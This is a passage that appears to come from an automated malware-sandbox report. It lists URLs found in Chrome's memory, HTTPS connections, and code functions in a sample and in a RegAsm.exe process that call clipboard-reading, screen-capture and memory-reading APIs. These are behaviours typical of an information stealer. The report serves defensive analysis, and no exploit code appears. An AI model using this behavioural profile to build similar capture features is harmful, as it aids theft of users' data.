Source: chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000008.00000003.995658757.000009B0006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.990996317.000009B401A6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000008.00000002.2130527345.000009B400254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.groupon.com/cart
Source: chrome.exe, 00000008.00000002.2132563631.000009B4007DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000008.00000003.985972812.000009B4019D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1548179845.000009B401986000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141692234.000009B40198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1589635667.000009B401986000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1631169626.000009B401986000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985972812.000009B4019D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1548179845.000009B401986000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.ciOLm-Jy21Y.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000008.00000003.985462586.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989999147.000009B40148C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.988406192.000009B4019BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985646219.000009B401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.985862674.000009B401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2141656584.000009B401980000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.989939605.000009B401944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.gyN29IQRsEA.L.W.O/m=qmd
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.guitarcenter.com/cart
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.harborfreight.com/checkout/cart
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hmhco.com/hmhstorefront/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.homedepot.com/mycart/home
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.homesquare.com/Checkout/Cart.aspx
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hottopic.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hsn.com/checkout/bag
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ikea.com/us/en/shoppingcart/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.jcpenney.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.jcrew.com/checkout/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.joann.com/cart
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.kohls.com/checkout/shopping_cart.jsp
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.landsend.com/shopping-bag/
Source: chrome.exe, 00000008.00000002.2131890551.000009B400664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.973480513.000009B400664000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplay
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.lowes.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.lulus.com/checkout/bag
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.macys.com/my-bag
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.midwayusa.com/cart
Source: chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130385732.000009B4001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137418725.000009B4010B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: chrome.exe, 00000008.00000002.2133904022.000009B400A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release1.2.164946
Source: chrome.exe, 00000008.00000002.2136603991.000009B400F34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release7
Source: chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2134021100.000009B400A54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130385732.000009B4001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2136206579.000009B400E94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
Source: chrome.exe, 00000008.00000002.2137246401.000009B401070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/#
Source: chrome.exe, 00000008.00000002.2130945695.000009B400364000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137418725.000009B4010B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/0
Source: chrome.exe, 00000008.00000002.2130945695.000009B400364000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133973444.000009B400A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137418725.000009B4010B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/0B
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.neimanmarcus.com/checkout/cart.jsp
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nike.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nordstrom.com/shopping-bag
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.officedepot.com/cart/shoppingCart.do
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.opticsplanet.com/checkout/cart
Source: chrome.exe, 00000008.00000002.2135416481.000009B400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.oracle.com/search/results
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.otterbox.com/en-us/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.overstock.com/cart
Source: chrome.exe, 00000008.00000002.2133148112.000009B4008D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pacsun.com/on/demandware.store/Sites-pacsun-Site/default/Cart-Show
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.petsmart.com/cart/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pier1.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pokemoncenter.com/cart
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.potterybarn.com/shoppingcart/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qvc.com/checkout/cart.html
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.redbubble.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.rei.com/ShoppingCart
Source: chrome.exe, 00000008.00000003.1272121186.000009B401340000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.rest.co.il
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.revolve.com/r/ShoppingBag.jsp
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.rockauto.com/en/cart/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.saksfifthavenue.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.samsclub.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sephora.com/basket
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.shutterfly.com/cart/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.staples.com/cc/mmx/cart
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sweetwater.com/store/cart.php
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.talbots.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.target.com/cart
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.teacherspayteachers.com/Cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.therealreal.com/cart
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.tractorsupply.com/TSCShoppingCartView
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ulta.com/bag
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.underarmour.com/en-us/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.urbanoutfitters.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.vitalsource.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.walgreens.com/cart/view-ui
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.walmart.com/cart
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wayfair.com/v/checkout/basket/show
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.weightwatchers.com/us/shop/checkout/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.westelm.com/shoppingcart/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wiley.com/en-us/cart
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.williams-sonoma.com/shoppingcart/
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wish.com/cart
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000008.00000002.2137374756.000009B40109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2130814925.000009B400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000008.00000002.2141553304.000009B4018B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2133393957.000009B400940000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137669235.000009B40110C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000008.00000002.2140308644.000009B4014F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zappos.com/cart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zazzle.com/co/cart
Source: chrome.exe, 00000008.00000002.2133827650.000009B4009F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zennioptical.com/shoppingCart
Source: chrome.exe, 00000008.00000002.2133778489.000009B4009E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www2.hm.com/en_us/cart

Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49673
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.19.177:443 -> 192.168.11.20:49730 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_00430850 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

7_2_00430850

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_00430850 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

7_2_00430850

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_00430A30 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

7_2_00430A30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043CCB0 NtWow64ReadVirtualMemory64,		7_2_0043CCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00438FC0 NtWow64ReadVirtualMemory64,		7_2_00438FC0

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Code function: 0_2_00007FF7D77F5480	0_2_00007FF7D77F5480
Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Code function: 0_2_00007FF7D77F73F8	0_2_00007FF7D77F73F8
Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Code function: 0_2_00007FF7D7800AC8	0_2_00007FF7D7800AC8
Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Code function: 0_2_00007FF7D77F7B00	0_2_00007FF7D77F7B00
Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Code function: 0_2_00007FF7D77FC9FC	0_2_00007FF7D77FC9FC
Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Code function: 0_2_00007FF7D77F6534	0_2_00007FF7D77F6534
Source: C:\Users\user\Desktop\7IXl1M9JGV.exe	Code function: 0_2_00007FF7D77F8D4C	0_2_00007FF7D77F8D4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041B840	7_2_0041B840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043D840	7_2_0043D840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004358F0	7_2_004358F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043609F	7_2_0043609F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00439140	7_2_00439140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041C920	7_2_0041C920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043F9D0	7_2_0043F9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00421A80	7_2_00421A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043D340	7_2_0043D340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041A360	7_2_0041A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00440330	7_2_00440330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043CCB0	7_2_0043CCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00418D6F	7_2_00418D6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041D570	7_2_0041D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042B503	7_2_0042B503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00417DCE	7_2_00417DCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041FDF0	7_2_0041FDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043CF00	7_2_0043CF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00435700	7_2_00435700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004247C0	7_2_004247C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00418782	7_2_00418782
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042E040	7_2_0042E040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00427850	7_2_00427850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040A070	7_2_0040A070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00401000	7_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042B0EC	7_2_0042B0EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00425892	7_2_00425892
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0043C891	7_2_0043C891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0042D094	7_2_0042D094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004230A6	7_2_004230A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040F0B0	7_2_0040F0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00439940	7_2_00439940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00408960	7_2_00408960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0040C170	7_2_0040C170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0041911F	7_2_0041911F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00426122	7_2_00426122
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004301C0	7_2_004301C0
